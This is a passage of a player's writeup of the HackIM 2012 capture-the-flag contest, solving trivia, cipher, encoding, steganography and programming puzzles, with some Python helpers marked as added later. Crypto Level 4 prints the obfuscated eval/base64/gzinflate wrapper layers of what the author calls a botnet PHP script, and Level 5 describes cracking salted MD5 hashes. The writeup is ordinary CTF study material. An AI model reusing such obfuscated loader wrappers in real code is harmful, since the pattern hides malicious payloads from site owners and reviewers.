
HackIM 2012 CTF


Detailed approach of how i solved all the levels of HackIM 2012 CTF

himanshudas

March 06, 2012

Transcript

  1. My Acknowledgement To:

    Anant Shrivastava (infinity), Prashant KV (kvbhai), Dhanesh K (danny), Riyaz Walikar (karniv0re), Murtuja Bharmal (void), Aseem Jakhar (@), Rahul Sasi (FB1H2S), Pardhasaradhi CH (pardhu), Chaithu Rk (Antagonist), Amol Naik (AMol NAik), Prince Boonlia (boonlia), Atul Alex Cherian (Aodrulez), Pushkar Pashupat (push), Abhisek Datta (adatta), Ajit Hatti (adh), Bipin Upadhyay (om), Hemanshu Asolia (h3m4n), Shannon Morse (snubs) & Team from Hak5 - Trust Your Technolust #@>_
    Rajarajeswari College Of Engineering, Bangalore
  2. Few cheeky lines that will gear up the CTF thrill:

    - Kitne level the, 35 sardaar.
    - A computer, plenty of time, lots of patience and a challenging CTF, what else does a hacker need to be happy?
    - Don't cry at the beginning of the CTF. Cry at the end of the CTF.
    - Unfortunately, no one can be told what the CTF is. You have to see it for yourself.
    - I know why you're playing CTF, Neo. I know what you've been doing... why you hardly sleep, why you live alone and why night after night, you sit by your computer. You're looking for the flag. I know because I was once looking for the same thing. I was looking for an answer. It's the question that drives us, Neo. It's the question that brought you here. You know the question, just as I did.

    Before everything else, a word, in fact a request: kindly avoid going through this writeup before you have attempted it with your wildest idea, your weird assumptions, your hottest tools, craziest Einstein's formula, or a logic that never fails.

    Brief Overview of CTF Layout: the CTF was divided into 7 sections, each with 5 levels of challenges.
    1. Trivia Levels: Brain-teasers/Riddles
    2. Crypto Levels: Mystified ciphers/Substitutions
    3. Programming Levels: Mathematical logic/Hash Cracking
    4. Web Levels: Redirection/Injection
    5. Reverse Engineering Levels: PE/Apk/Memory Dump
    6. Log Analysis: Analyzing pcap/scanner generated logs
    7. Forensics Level: Incident Analysis
  3. Trivia Levels

    Trivia Level 1
    Official Hint: N/A
    Page Source: Nothing Interesting
    Description: This operating system also refers to a 1982 science fiction film, a board game, and a song off the Prodigy B-Side "What Evil Lurks".
    Analysis: A quick Google search with the keyword "scifi movie list 1982" revealed android as the first result.
    Flag: android

    Trivia Level 2
    Official Hint: N/A
    Page Source: Nothing Interesting
    Description: This fictional IPv4 packet header field was proposed in RFC 3514 as a means for identifying packets with malicious intent.
    Analysis: A Google search with the keyword "fictional IPv4 packet header field" revealed the flag.
    Flag: evil bit

    Trivia Level 3
    Official Hint: N/A
    Page Source: Nothing Interesting
    Description: This humorous RFC of the Internet Engineering Task Force describes a communication and control protocol suite designed for allowing infinite numbers of monkeys with infinite numbers of typewriters to produce the entire works of William Shakespeare.
    Analysis: A Google search with the keyword "communication and control protocol suite designed for allowing infinite numbers of monkeys" revealed the flag.
    Flag: RFC 2795
  4. Trivia Level 4

    Official Hint: N/A
    Page Source: Nothing Interesting
    Description: Metasploit was originally coded for what purpose?
    Analysis: I can remember going through the book "Metasploit Toolkit", where it was mentioned that Metasploit was originally started as a network security game.
    Flag: game

    Trivia Level 5
    Official Hint: N/A
    Page Source: Nothing Interesting
    Description: Released on April 1st 2003, this esoteric programming language uses spaces, tabs and linefeeds to compose commands.
    Analysis: A Google search with the keyword "April 1st 2003 programming language" revealed the flag as whitespace.
    Flag: whitespace

    Crypto Levels

    Crypto Level 1: Ulta Pulta
    Official Hint: poiuyt
    Page Source: <!-- <img src="http://www.instablogsimages.com/images/2009/09/14/recycled-keyboard-computer-mirror1_VXLbh_24429.jpg"> -->
    Description: Oexjwok -333 lauiljt bwxylexk hilyruik krbf lk yfi frzlx jekbeqaexi bwzqwxixy. ofiui yfi QB blx kixj lx iaibyueb kfwbs yfuwrgf yfi sitcwluj eh yfi frzlx jwik kwziyfexg yfly jwik xwy qailki Oexjwok, 2 Ceaa Glyik
    Analysis: The page source revealed an image of a mirrored keyboard. Carefully observing each character in the given string against the keyboard, mapping the right side with the left and vice versa, the flag was revealed.
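The mirror mapping from the analysis above, as an added Python example that is not part of the deck. The key rows are the assumption: a standard US QWERTY layout, with the number row taken as the twelve keys 1234567890-= so that 3 pairs with 0 and 2 with -, and the comma paired with the period as the author did. The description string is the one from the page.

```python
# Mirror-keyboard substitution: the key at distance k from the left end of a row
# maps to the key at distance k from the right end of the same row.
# Added example, not the deck's code. ROWS is the assumed layout.
ROWS = [
    "1234567890-=",   # 1<->=, 2<->-, 3<->0, 4<->9, 5<->8, 6<->7
    "qwertyuiop",     # q<->p, w<->o, e<->i, r<->u, t<->y
    "asdfghjkl",      # a<->l, s<->k, d<->j, f<->h, g<->g
    "zxcvbnm",        # z<->m, x<->n, c<->b, v<->v
    ",.",             # the author pairs comma and period with each other
]


def build_mirror_map(rows=ROWS):
    """Map every key in each row to its mirror image within that row."""
    table = {}
    for row in rows:
        for ch, mirrored in zip(row, reversed(row)):
            table[ch] = mirrored
    return table


def mirror_decode(text, table=None):
    """Decode (or encode: the mapping is its own inverse), preserving case.
    Characters on no row, such as spaces, pass through unchanged."""
    table = table or build_mirror_map()
    out = []
    for ch in text:
        low = ch.lower()
        if low in table:
            sub = table[low]
            out.append(sub.upper() if ch.isupper() else sub)
        else:
            out.append(ch)
    return "".join(out)


# The Crypto Level 1 description string as given on the page.
CIPHERTEXT = ("Oexjwok -333 lauiljt bwxylexk hilyruik krbf lk yfi frzlx "
              "jekbeqaexi bwzqwxixy. ofiui yfi QB blx kixj lx iaibyueb kfwbs "
              "yfuwrgf yfi sitcwluj eh yfi frzlx jwik kwziyfexg yfly jwik xwy "
              "qailki Oexjwok, 2 Ceaa Glyik")

if __name__ == "__main__":
    print(mirror_decode(CIPHERTEXT))
```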
  5. Keyboard Mapping:

    3 == 0
    - == 2
    . == ,
    q == p
    a == l
    z == m
    Flag: Windows 2000 already contains features such as the human discipline component, where the PC can send an electric shock through the keyboard if the human does something that does not please Windows. - Bill Gates

    Crypto Level 2: White Noise
    Official Hint: Follow the White Rabbit: P (by spnow)
    Page Source: <!-- md5sum: b80a5ce8b0c6c57a0258f34dd5905970 -->
    Description: shhhkoinahihai
    Analysis:
    First Attempt (leet way): I went through the Wikipedia article about Whitespace (programming language) and got an idea that the given whitespace contains tabs and spaces, which must be replaced by 1 and 0.
    1. Copied the whitespace to gedit (text editor).
    2. Replaced the tabs with 1 and the spaces with 0.
    3. Got the following sequence of 0's and 1's.
  6. (Crypto Level 2, continued)

    4. Now, this binary sequence needs to be converted into something meaningful, therefore I googled for "binary to text translator" and got an online tool at http://home.paulschou.net/tools/xlate/
    5. Translated the binary sequence, but to my surprise I couldn't get any meaningful information. Where did I have it wrong?
    Second Attempt (leet way):
    6. After I thought it over, I came to conclude: how about replacing tabs with 0 and spaces with 1?
    7. There, got a new sequence, with expectations.
    8. Again I used the same binary to text translator, and voila!!! There was our flag.
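Both attempts above in one place, as an added Python example that is not part of the deck: the only difference between the failed and the successful decode is which of tab/space stands for 1, so the decoder tries both polarities and keeps the one that comes out as printable text. The whitespace blob it runs on is constructed here, not the challenge file.

```python
import string

# Crypto Level 2: tabs and spaces carry one bit each. The first attempt used
# tab=1/space=0 and got garbage; the second (tab=0/space=1) gave the flag.
# Added example, not the deck's code. With the wrong polarity every byte is the
# bitwise complement of the real one, so an ASCII message turns into bytes >= 0x80,
# which is what the printable-text check below detects.

PRINTABLE = set(string.printable)


def whitespace_to_bits(blob, tab_value):
    """Turn a tab/space string into a '0'/'1' string (the same job as
    tr "\\t " "01" in the shell). Other characters, e.g. a trailing newline, are ignored."""
    space_value = "1" if tab_value == "0" else "0"
    return "".join(tab_value if c == "\t" else space_value
                   for c in blob if c in "\t ")


def bits_to_text(bits):
    """Group into 8-bit words and decode as ASCII; a trailing partial byte is dropped."""
    usable = len(bits) - len(bits) % 8
    return "".join(chr(int(bits[i:i + 8], 2)) for i in range(0, usable, 8))


def decode_whitespace(blob):
    """Try tab=1 first (the author's first attempt), then tab=0. Returns
    (polarity, text) for the readable result, or (None, None) if neither is."""
    for tab_value in ("1", "0"):
        text = bits_to_text(whitespace_to_bits(blob, tab_value))
        if text and all(c in PRINTABLE for c in text):
            return tab_value, text
    return None, None


def encode_whitespace(text, tab_value="0"):
    """Inverse mapping, used only to build a constructed sample blob."""
    space_value = "1" if tab_value == "0" else "0"
    bits = "".join(format(ord(c), "08b") for c in text)
    return "".join("\t" if b == tab_value else " " for b in bits)


# Constructed sample (not the challenge file): a short message hidden with tab=0,
# the polarity that worked for the real challenge.
SAMPLE = encode_whitespace("KB 276304", tab_value="0") + "\n"

if __name__ == "__main__":
    print(decode_whitespace(SAMPLE))
```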
  7. Alternate Method:

    The above method seems to require lots of hard work. Thus, we can even solve the above problem in this alternate way:
    1. Copy the whitespace to gedit (text editor) and save it.
    2. In Linux there is a utility called "tr" to translate characters.
    3. Type at the terminal: cat whitespace.txt | tr "\t " "01" (Note: there is a space after \t)
    4. There is our binary sequence; again we can copy it into the binary to text translator to get the flag.
    Flag: Error Message: Your Password Must Be at Least 18770 Characters and Cannot Repeat Any of Your Previous 30689 Passwords - MS KB 276304

    Crypto Level 3: The Base Test
    Official Hint: http://lmgtfy.com/?q=RFC+for+base+encoding
    Page Source: ====5JP2T6UH5JR4UKRJSZTOEEJKN2TYUMFLXKUMFHJJTJVWULRIGSTGFCZKWZVEDJVJ====
    Description: N/A
    Analysis: I went through RFC 4648 twice, but didn't find anything highly influencing that could eventually get me to the flag. However, I got a very basic idea about the patterns of the various types of base encodings. My assumptions on the given string were:
    - Rot-13
    - Reverse
    - Base64
    - Base32
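The chain the author eventually found for this string (strip the '=' wrapper, reverse, then base32-decode twice), as an added Python example that is not part of the deck. apply_chain takes the transforms from the candidate list above by name, so any ordering can be tried as data; the input is the page-source string from the page.

```python
import base64
import codecs

# Crypto Level 3: the page-source string is, from the inside out, base32, base32
# again, reversed, and wrapped in '=' on both ends. Added example, not the deck's
# code. TRANSFORMS holds the four candidates the author listed plus the padding
# strip; data is bytes throughout so the decoders can be chained freely.
TRANSFORMS = {
    "strip_padding": lambda b: b.strip(b"="),
    "reverse": lambda b: b[::-1],
    "rot13": lambda b: codecs.encode(b.decode("ascii"), "rot_13").encode("ascii"),
    "base64": base64.b64decode,
    "base32": base64.b32decode,
}


def apply_chain(data, steps):
    """Apply each named transform in order."""
    for name in steps:
        data = TRANSFORMS[name](data)
    return data


# The Crypto Level 3 page source, as given on the page.
PAGE_SOURCE = b"====5JP2T6UH5JR4UKRJSZTOEEJKN2TYUMFLXKUMFHJJTJVWULRIGSTGFCZKWZVEDJVJ===="


def solve_base_test(blob=PAGE_SOURCE):
    """Steps 1-4 of the writeup: strip '=', reverse, base32-decode, base32-decode."""
    return apply_chain(blob, ["strip_padding", "reverse", "base32", "base32"]).decode("ascii")


if __name__ == "__main__":
    print(apply_chain(PAGE_SOURCE, ["strip_padding", "reverse"]).decode())            # step 2
    print(apply_chain(PAGE_SOURCE, ["strip_padding", "reverse", "base32"]).decode())  # step 3
    print(solve_base_test())                                                          # step 4
```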
  8. Went past through combinations of several of the above assumptions, and finally got the flag with the following steps:

    1. Remove = from both ends of the given string.
    2. Reverse the string: "JVJDEVZWKZCFGTSGIRLUWVJTJJHFMUKXLFMUYT2NKJEEOTZSJRKU4RJ5HU6T2PJ5"
    3. Apply base32 decoding: "MR2W6VDSNFDWKU3JNVQWYYLOMRHGO2LUNE======"
    4. Again apply base32 decoding to the result of Step 3 to get the flag.
    To reverse the text: http://textmechanic.com/Reverse-Text-Generator.html
    To decode base32: http://online-calculators.appspot.com/base32/
    Flag: duoTriGeSimalandNgiti

    Crypto Level 4: Elucidate
    Official Hint: N/A
    Page Source: <!-- md5sum: ad4e2705406ef1197f03f93474e30020 -->
    Description: Elucidate
    Analysis: Nothing seems to be better than sleeping rather than going on decoding those obfuscated PHP scripts. The first, laziest thing that I decided to do was to look for an online tool that would do the job without requiring going through several decoding steps. Eventually I came across an online tool: http://www.whitefirdesign.com/resources/unobfuscate-php-hack-code.html
    Now back to the analysis part again. Let us understand the script part by part:
    <?php $vaa8089358f2="\x62\141\x73\145\x36\64\x5f\144\x65\143\x6f\144\x65";@eval($vaa8089358f2("**base 64 encoded string**")); ?>
    - On the first line, a variable is being set to a string that's being represented by a mix of hexadecimal ('\x') and octal ('\') escape sequences. Python uses the same escapes as PHP for hex and octal, so it's easy to use the Python shell to see a "normalized" ASCII representation of these strings.
    Python shell below:
    >>> "\x62\141\x73\145\x36\64\x5f\144\x65\143\x6f\144\x65"
    'base64_decode'
  9. - Next idea was to decode the base64 encoded string.

    - I used the online tool mentioned above and got an unformatted PHP script.
    - A quick Google search revealed that there was a PHP formatter at http://www.prettyprinter.de
    - So by this time I had decoded the base64 encoded string with proper formatting.
    - On further analysis I found another obfuscated script:
      @eval($w67426c2c6071d5516d2011022955d36($d9917ccba06ba0e3ed151e1b9461ae76($xaa4294a0bca922b2cc8b9a2789e95fa("...long base64 blob omitted..."))));
    - And there was another base64 encoded string inside it.
    - Now the online tool comes into play. The above script is of the form:
      @eval(gzinflate(base64_decode(str_rot13("base64_encoded"))));
    - The output revealed some kind of botnet behaviour; however at this point I was least bothered about this fact, and kept on observing it.
    - A quick overview of the output attracted me with the following variable:
      $_4fa3332ef3d19e9840387434b8d28780 = "\x6f\156\x6c\171\x62\171\x6f\142\x73\145\x72\166\x69\156\x67\164\x68\151\x73\143\x6f\156\x64\151\x74\151\x6f\156\x77\157\x75\154\x64\164\x68\145\x72\145\x73\165\x6c\164\x73\157\x66\157\x75\162\x77\157\x72\153\x62\145\x72\145\x67\141\x72\144\x65\144\x61\163\x66\165\x6c\154\x79\143\x6f\156\x63\154\x75\163\x69\166\x65\141\x6e\144\x61\163\x68\141\x76\151\x6e\147\x65\154\x75\143\x69\144\x61\164\x65\144\x74\150\x65\156\x6f\162\x6d\141\x6c\143\x6f\165\x72\163\x65\157\x66\164\x68\145\x70\150\x65\156\x6f\155\x65\156\x61";
    - Hoping this would be the final step, I used the Python shell. In case anyone doesn't have Python installed, Google App Engine for Python would really be helpful at http://shell.appspot.com/, or maybe there are multiple other ways to decode it.
    >>> "\x6f\156\x6c\171\x62\171\x6f\142\x73\145\x72\166\x69\156\x67\164\x68\151\x73\143\x6f\156\x64\151\x74\151\x6f\156\x77\157\x75\154\x64\164\x68\145\x72\145\x73\165\x6c\164\x73\157\x66\157\x75\162\x77\157\x72\153\x62\145\x72\145\x67\141\x72\144\x65\144\x61\163\x66\165\x6c\154\x79\143\x6f\156\x63\154\x75\163\x69\166\x65\141\x6e\144\x61\163\x68\141\x76\151\x6e\147\x65\154\x75\143\x69\144\x61\164\x65\144\x74\150\x65\156\x6f\162\x6d\141\x6c\143\x6f\165\x72\163\x65\157\x66\164\x68\145\x70\150\x65\156\x6f\155\x65\156\x61"
    'onlybyobservingthisconditionwouldtheresultsofourworkberegardedasfullyconclusiveandashavingelucidatedthenormalcourseofthephenomena'
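The two decoding steps of this level in one script, as an added Python example that is neither the deck's code nor the online tool the author used: php_unescape resolves PHP's mixed \xHH/\OOO string escapes (run here on the two escaped strings from the page), and unpack_layer undoes the eval(gzinflate(base64_decode(str_rot13(...)))) wrapper. The inner PHP script that is packed and unpacked is constructed, not the challenge's.

```python
import base64
import codecs
import re
import zlib

# Crypto Level 4. Added example, not the deck's code or tool.
# (1) PHP double-quoted strings may mix "\x62" (hex) and "\141" (octal) escapes;
#     php_unescape() renders them so the hidden function name becomes readable.
# (2) The script body has the shape eval(gzinflate(base64_decode(str_rot13(BLOB))));
#     unpack_layer() undoes the three wrappers in reverse order.

_ESCAPE = re.compile(r"\\x([0-9A-Fa-f]{1,2})|\\([0-7]{1,3})")


def php_unescape(s):
    """Resolve \\xHH and \\OOO escapes the way a PHP double-quoted string does."""
    def repl(m):
        if m.group(1) is not None:
            return chr(int(m.group(1), 16))
        return chr(int(m.group(2), 8) & 0xFF)
    return _ESCAPE.sub(repl, s)


def unpack_layer(blob):
    """Reverse gzinflate(base64_decode(str_rot13(blob))): rot13, base64, raw inflate."""
    unrotated = codecs.encode(blob, "rot_13")        # str_rot13 is its own inverse
    compressed = base64.b64decode(unrotated)
    return zlib.decompress(compressed, -15).decode("utf-8")   # -15: raw DEFLATE, as gzinflate()


def pack_layer(source):
    """Build a blob of the same shape, so the unpacker can be exercised offline."""
    comp = zlib.compressobj(9, zlib.DEFLATED, -15)
    compressed = comp.compress(source.encode("utf-8")) + comp.flush()
    return codecs.encode(base64.b64encode(compressed).decode("ascii"), "rot_13")


# From the page: the first line of the challenge script assigns this to a variable.
OBFUSCATED_NAME = r"\x62\141\x73\145\x36\64\x5f\144\x65\143\x6f\144\x65"

# From the page: the variable that turned out to hold the flag.
FLAG_ESCAPED = (r"\x6f\156\x6c\171\x62\171\x6f\142\x73\145\x72\166\x69\156\x67\164\x68\151\x73\143"
                r"\x6f\156\x64\151\x74\151\x6f\156\x77\157\x75\154\x64\164\x68\145\x72\145\x73\165"
                r"\x6c\164\x73\157\x66\157\x75\162\x77\157\x72\153\x62\145\x72\145\x67\141\x72\144"
                r"\x65\144\x61\163\x66\165\x6c\154\x79\143\x6f\156\x63\154\x75\163\x69\166\x65\141"
                r"\x6e\144\x61\163\x68\141\x76\151\x6e\147\x65\154\x75\143\x69\144\x61\164\x65\144"
                r"\x74\150\x65\156\x6f\162\x6d\141\x6c\143\x6f\165\x72\163\x65\157\x66\164\x68\145"
                r"\x70\150\x65\156\x6f\155\x65\156\x61")

# Constructed inner script, wrapped the way the challenge wrapped its second layer.
INNER_SOURCE = '$constructed = "\\x68\\151"; echo $constructed;'
PACKED = pack_layer(INNER_SOURCE)

if __name__ == "__main__":
    print(php_unescape(OBFUSCATED_NAME))   # base64_decode
    print(php_unescape(FLAG_ESCAPED))      # onlybyobserving...
    print(unpack_layer(PACKED))            # the constructed inner script
```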
  10. Flag: onlybyobservingthisconditionwouldtheresultsofourworkberegardedasfullyconclusiveandashavingelucidatedthenormalcourseofthephenomena

    Crypto Level 5: Yeah! As you guessed, it's Steganography
    Official Hint: Yeah! As you guessed, it's Steganography
    Page Source: <!-- Hs Foe vhmmhng un!qrdvdot!Ewhl!btu!nou!@ble> Thdn!id!hr NOU Omoipouenu/!Hs!Id!@ble- cuu!NNU vhllhof>!Thdn!Id!hr!Lamdvoldnu/ Hs Id Cnth @bme and!Vimliog> Tidn Vhdobe Bnldui Ewhl>!Ir hd!Neitidr!@cmd!Oor Villhnf>!Tidn!WHY!ball!him FOE? -!Dqhbtrusongnd -->
    Description: Llun Saving Bank is fed up with known encryption standards to store the data. They decided to reinvent the wheel. Can you decode the data?
    Analysis: A close look at the initials of the title "Llun Saving Bank" suggests LSB. I didn't know much about the LSB encoding technique in text; however I have come across one with an image in some war-game. I had a look over LSB on Wikipedia and got an idea to include the rightmost bit of each character. I converted the given text into binary and whoa, I was left with a long list of binary. This was a real challenging job to get the rightmost bit. Therefore a simple Python script made my task easier:

      result = ''
      ciphertext = '<paste binary here>'   # 8-bit groups separated by spaces, e.g. "01001000 01110011 ..."
      bits = ciphertext.replace(' ', '')   # drop the separators so every group is exactly 8 wide
      for i in range(7, len(bits), 8):     # index 7, 15, 23, ... is the last (least significant) bit of each group
          result += bits[i]
      print(result)

    Note: My Python script assumes the binary with a space between each word, something like "01001000 01110011 00100000......." and so on.
    On executing the Python script, I was able to get the LSB of each character, which I converted to ASCII using http://home.paulschou.net/tools/xlate/, and there was our flag in plain text.
    Flag: Learn howto Hide in Plain Sight
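Reading the least-significant bits straight from the cover text, without the detour through a binary dump, as an added Python example that is not the deck's script. The cover is the page-source comment quoted above; lsb_embed shows the matching embed step on a cover of your own (it is what turns spaces into "!" and e into d in the challenge text), and changed_positions lists which characters a suspect text differs in from its clean original.

```python
# Crypto Level 5 ("Llun Saving Bank" = LSB): each cover character carries one bit
# of the message in its least significant bit, eight cover characters per message
# byte, most significant bit first. Added example, not the deck's script.

# The page-source comment from the page (248 characters = 31 bytes of message).
COVER = ("Hs Foe vhmmhng un!qrdvdot!Ewhl!btu!nou!@ble> Thdn!id!hr NOU Omoipouenu/!Hs!Id!@ble- "
         "cuu!NNU vhllhof>!Thdn!Id!hr!Lamdvoldnu/ Hs Id Cnth @bme and!Vimliog> Tidn Vhdobe "
         "Bnldui Ewhl>!Ir hd!Neitidr!@cmd!Oor Villhnf>!Tidn!WHY!ball!him FOE? -!Dqhbtrusongnd")


def lsb_extract(cover):
    """Collect the LSB of each character into bytes, MSB-first within each group of eight."""
    out = []
    for i in range(0, len(cover) - len(cover) % 8, 8):
        byte = 0
        for ch in cover[i:i + 8]:
            byte = (byte << 1) | (ord(ch) & 1)
        out.append(chr(byte))
    return "".join(out)


def lsb_embed(plain_cover, message):
    """Set the LSB of successive cover characters to the message bits.
    Only the LSB changes, so ' ' becomes '!', 'e' becomes 'd', and so on.
    The cover must be at least eight times as long as the message."""
    bits = [(ord(c) >> k) & 1 for c in message for k in range(7, -1, -1)]
    if len(bits) > len(plain_cover):
        raise ValueError("cover text too short for message")
    stego = [chr((ord(c) & ~1) | b) for c, b in zip(plain_cover, bits)]
    return "".join(stego) + plain_cover[len(bits):]


def changed_positions(plain_cover, stego):
    """Indices where a suspect text differs from the clean cover; handy when eyeballing."""
    return [i for i, (a, b) in enumerate(zip(plain_cover, stego)) if a != b]


if __name__ == "__main__":
    print(lsb_extract(COVER))   # Learn howto Hide in Plain Sight
```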
  11. Programming Levels

    Programming Level 1: ROTOMATA
    Official Hint: N/A
    Page Source: <!-- We only know the first 6 characters: "Men at" -->
    Description: Mfp ey zwvo fvat rjx hwprdrr lb nawzh tnfpc: Anj icvlu, hjgy Kbffhg, zk hjp gm nso nntjj, phf sw vawwhnwer, pcum nu oeq ewllxqmqit
    Analysis: I really didn't spend much time on decoding the whole string. Rather, I analyzed the difference between the first three words, and then googled for it.
    M-M=0, e-f=1, n-p=2, space=3, a-e=4, t-y=5, space=6, s-z=7, o-w=8, m-v=9, e-o=10
    Hence, the first three words that I obtained were "Men at some". After I googled it, I got the famous quote by William Shakespeare, which was the flag.
    Flag: Men at some time are masters of their fates: The fault, dear Brutus, is not in our stars, but in ourselves, that we are underlings
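The known-plaintext comparison from the analysis above, as an added Python example that is not the deck's code: recover_shifts reproduces the author's per-character table for any ciphertext/plaintext prefix, and decode_indexed_shift applies the rule read off that table (shift equals character position, spaces counted) to the opening words. The deck only claims that rule for the first three words, so that is as far as the decoder is run.

```python
import string

# Programming Level 1 (ROTOMATA). Added example, not the deck's code. The page
# source gives the plaintext "Men at"; lining it up against the ciphertext shows
# a shift that grows by one per character, spaces included.

ALPHA = string.ascii_lowercase

# The challenge description string, as given on the page.
CIPHER = ("Mfp ey zwvo fvat rjx hwprdrr lb nawzh tnfpc: Anj icvlu, hjgy Kbffhg, "
          "zk hjp gm nso nntjj, phf sw vawwhnwer, pcum nu oeq ewllxqmqit")


def recover_shifts(cipher, known_plain):
    """Per-position shift (cipher - plain) mod 26; None where either side is not a letter."""
    shifts = []
    for c, p in zip(cipher, known_plain):
        if c.isalpha() and p.isalpha():
            shifts.append((ALPHA.index(c.lower()) - ALPHA.index(p.lower())) % 26)
        else:
            shifts.append(None)
    return shifts


def decode_indexed_shift(cipher, length=None):
    """Undo shift = character index over the first `length` characters,
    preserving case; non-letters keep their position and pass through."""
    out = []
    for i, c in enumerate(cipher[:length]):
        if c.isalpha():
            p = ALPHA[(ALPHA.index(c.lower()) - i) % 26]
            out.append(p.upper() if c.isupper() else p)
        else:
            out.append(c)
    return "".join(out)


if __name__ == "__main__":
    print(recover_shifts("Mfp ey zwvo", "Men at some"))   # the author's table
    print(decode_indexed_shift(CIPHER, 11))                # Men at some
```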
  12. Programming Level 2: Pascal's Triangle

    Official Hint: N/A
    Page Source: <!-- ex: The sum of all middle terms till first 6 rows is 9 -->
    Description: The Flag is the sum of all middle terms till first 1337 rows of Pascal's Triangle
    Analysis: This seemed to be easy at first sight. My first expectation was to get some cooked-up code, but that really didn't work out; all I got was algorithms and some frustrated guy like me crying on the discussion forums to get their erroneous triangle code working. Googled Pascal triangle, went through Wikipedia about Pascal's triangle, WolframAlpha Pascal triangle. Frustration takes you to any height of paranormal activities. After spidering and crawling through the links, I came across some useful resources:
    http://rosettacode.org/wiki/Pascal's_triangle
    http://www.mathsisfun.com/pascals-triangle.html
    http://www.mathwords.com/b/binomial_coefficients_pascal.htm
    http://www.youtube.com/watch?v=OMr9ZF1jgNc
    So all up, time to do some serious coding.
    - The challenge considers the middle term of odd rows.
    - Wrote code in C and hoped it would work out; failed.
    - Looked for some Java code, compiled successfully, but when I executed it, I was staring at my LCD; the program went on running for more than 30 seconds on my i5, that was a stack overflow.
    - Time for some manual again; looked it over and realized that binomial coefficients could be essential to get me the flag.
    - Worked it out again for the 3rd time, now in Python, with unexpected hope; executed it, got something, and voila!!! that was the flag. This was the Python script:

      #!/usr/bin/python
      from math import factorial

      s = 0
      # Row n (0-indexed) has a single middle term only when n is even, i.e. the odd
      # rows when counted from 1; rows 0..1336 are the first 1337 rows. The middle term
      # of row n is the binomial coefficient C(n, n/2). Integer division keeps it exact
      # (the hint's check: the first 6 rows give 1 + 2 + 6 = 9).
      for n in range(0, 1337, 2):
          p = n // 2
          s += factorial(n) // (factorial(p) * factorial(n - p))
      print(s)

    Flag: 43659324741884237070936006832303643114239411987772786602066543431205872166674362332393596312576719064242547970040323267566530343333103970820072593578706234276624324605878186670972267056459871456566594569343564988621600326286475080697865518622537377534356455651048425097523734881838663157063304671110082383218294453737678744221560158357896856330703194356882895482874383651576271102847866170999680296497
  13. Programming Level 3: Your Brainfuck Sir...

    Official Hint: N/A
    Page Source: <!-- md5sum: 4f1ec9481c0f0ae0a199ea5c8dedf62d -->
    Description: Debug bfcode to get the flag
    Analysis: I had encountered brainfuck earlier but never this way. A Google search for a brainfuck interpreter resulted in http://www.iamcal.com/misc/bf_debug/ . Executed the given code without any input in the interpreter and observed the result. Something appeared partially which didn't seem to carry any useful meaning. Tried with some random input and got the same output again and again. Maybe a defect with the interpreter, LOL. It's MANUAL time now. Glanced across the lines on Wikipedia about the brainfuck programming language. There I got to see the small "Hello World" program. I executed it in the interpreter, and got the output successfully. Observed that in the brainfuck "Hello World" each line was ending with a period. The period has a special meaning in brainfuck: it is the same as a print statement, which the given brainfuck code was missing. GOT IT!!! So appending a period at the end of each line was all about getting the flag.
    Flag: ...In fact, never ever use gets() or sprintf(), period. If you do we will send evil dwarfs after you..

    Programming Level 4: Substitute Problem
    Official Hint: N/A
    Page Source: <!-- md5sum: 31178aa23ef43566009d97f38a470279 -->
    Description: deobfus
    Analysis: There wasn't much to do with this; everything was self-explanatory in the page itself. The only thing required with this challenge was plenty of time with lots of concentration. For me, it took nearly 2 continuous hours to get through all the iterations. Probably some hardcore programmer would have written a simple code to get it done in a few seconds. So my time complexity with this problem was exponentially equivalent to the programmer's. The final iteration revealed the code as:
    S E D U L o U S L Y E S C H E w o B F U S C A T o R Y H Y P E R V E R B o S I T Y A N D P R o L I X I T Y 8 4 R o E D Y GREEN
    On attempting variations of case, got the final flag.
    Flag: sedulously eschew obfuscatory hyperverbosity and prolixity 84 roedy green
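What the author observed in Programming Level 3, run in code as an added Python example that is neither the deck's code nor the online interpreter: a minimal brainfuck interpreter, and the fix of appending "." to every line so that each line prints the cell it finishes on. The challenge's program is not on the page, so the silent program below is constructed in its style (each line builds one character but never prints it).

```python
# Programming Level 3. Added example, not the deck's code. Brainfuck only emits
# output on '.', so a program whose lines lack it runs to the end printing nothing.


def run_brainfuck(code, input_bytes=b""):
    """Interpret the eight brainfuck commands; returns the output as bytes.
    Cells are 8-bit and wrap; ',' reads 0 once the input is exhausted."""
    jump, stack = {}, []                  # matching bracket positions, for O(1) loop jumps
    for pos, ch in enumerate(code):
        if ch == "[":
            stack.append(pos)
        elif ch == "]":
            start = stack.pop()
            jump[start], jump[pos] = pos, start
    tape, ptr, pc, inp, out = [0] * 30000, 0, 0, 0, bytearray()
    while pc < len(code):
        ch = code[pc]
        if ch == ">":
            ptr += 1
        elif ch == "<":
            ptr -= 1
        elif ch == "+":
            tape[ptr] = (tape[ptr] + 1) & 0xFF
        elif ch == "-":
            tape[ptr] = (tape[ptr] - 1) & 0xFF
        elif ch == ".":
            out.append(tape[ptr])
        elif ch == ",":
            tape[ptr] = input_bytes[inp] if inp < len(input_bytes) else 0
            inp += 1
        elif ch == "[" and tape[ptr] == 0:
            pc = jump[pc]
        elif ch == "]" and tape[ptr] != 0:
            pc = jump[pc]
        pc += 1
    return bytes(out)


def add_print_per_line(code):
    """The author's fix: append '.' to every non-empty line."""
    return "\n".join(line + "." for line in code.splitlines() if line.strip())


# Constructed sample: line 1 leaves 72 ('H') in cell 1 and the pointer on it,
# line 2 adds 33 to reach 105 ('i'); neither line prints.
SILENT = "++++++++[>+++++++++<-]>\n" + "+" * 33 + "\n"

if __name__ == "__main__":
    print(run_brainfuck(SILENT))                       # b''
    print(run_brainfuck(add_print_per_line(SILENT)))   # b'Hi'
```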
  14. Programming Level 5

    Official Hint: N/A
    Page Source: Nothing Interesting
    Description: A pinch of salt for your coffee, Sir?
    Analysis: I'm really bad at brute forcing and guessing unnatural passwords. With hope to get it correct this time, I went to the salt.asp page and generated hashes for a few random keywords. Sorry, wouldn't share those crazy ones; they nearly killed my system with overheating :D The basic idea was to crack the hash and identify the salt, which was the flag to complete this challenge. I looked around for an md5 cracker and got one at http://3.14.by/en/md5. Next I tried to crack the hashes for the random keywords. After a while, my system temperature went above the critical level and I had to shut down the process; that was a really disgusting job, to watch over the LCD and wait for the cracker to do its job. The cracker doesn't seem to understand that my system is not a blade server, or maybe I don't. On a final note, I decided to take the hash for either a single word or digit and crack it. Again the same boring task; in the first set I generated the hashes for 0-10, and finally on the second attempt, with the hash for "1", I got my flag.
    Working Steps:
    1. On the page salt.asp input the password as 1.
